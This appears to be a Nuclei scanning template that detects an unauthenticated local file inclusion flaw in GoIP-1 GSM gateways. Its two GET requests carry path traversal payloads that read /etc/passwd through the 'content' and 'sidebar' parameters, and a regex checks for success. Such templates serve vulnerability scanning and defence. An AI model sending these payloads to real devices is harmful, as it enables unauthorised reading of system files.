24 lines
914 B
YAML
24 lines
914 B
YAML
id: goip-1-lfi
|
|
|
|
info:
|
|
name: GoIP-1 GSM - Local File Inclusion
|
|
author: gy741
|
|
severity: high
|
|
description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
|
|
reference:
|
|
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
|
|
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
|
|
- http://en.dbltek.com/latestfirmwares.html
|
|
tags: gsm,goip,lfi,iot
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|